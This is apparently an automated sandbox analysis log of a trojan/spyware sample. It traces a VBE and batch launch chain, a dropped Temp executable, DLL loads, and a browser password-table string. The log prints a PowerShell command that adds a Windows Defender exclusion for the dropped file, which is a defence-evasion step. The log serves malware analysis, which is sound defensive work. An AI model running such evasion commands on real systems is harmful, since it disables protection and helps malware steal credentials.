                                  Source: 4.2.chainportruntimeCrtMonitor.exe.31996c0.20.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 4.2.chainportruntimeCrtMonitor.exe.2cc62a0.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@25/44@0/2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E36C74 GetLastError,FormatMessageW | 0_2_00E36C74
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree | 0_2_00E4A6C2
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\Desktop\ZlAIxOci.log
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\6debd4f4d7d9d55a90240b8cfae44a84a1758f30aa4344dbcd056f725fb9cbca
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | File created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxname | 0_2_00E4DF1E
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxstime | 0_2_00E4DF1E
Source: C:\Users\user\Desktop\file.exe | Command line argument: STARTDLG | 0_2_00E4DF1E
Source: C:\Users\user\Desktop\file.exe | Command line argument: xz | 0_2_00E4DF1E
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: E6dmBVnjFo.14.dr, Kqq2Zyhu2W.14.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: mscoree.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: apphelp.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: kernel.appcore.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: version.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: windows.storage.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: wldp.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: profapi.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: cryptsp.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: rsaenh.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: cryptbase.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: sspicli.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: ktmw32.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: amsi.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: userenv.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: ntmarta.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: wbemcomn.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: uxtheme.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: propsys.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: dlnashext.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: wpdshext.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: edputil.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: urlmon.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: iertutil.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: srvcli.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: netutils.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: wintypes.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: appresolver.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: bcp47langs.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: slc.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: sppc.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Section loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: winmmbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mmdevapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ksuser.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: avrt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: audioses.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: msacm32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: midimap.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
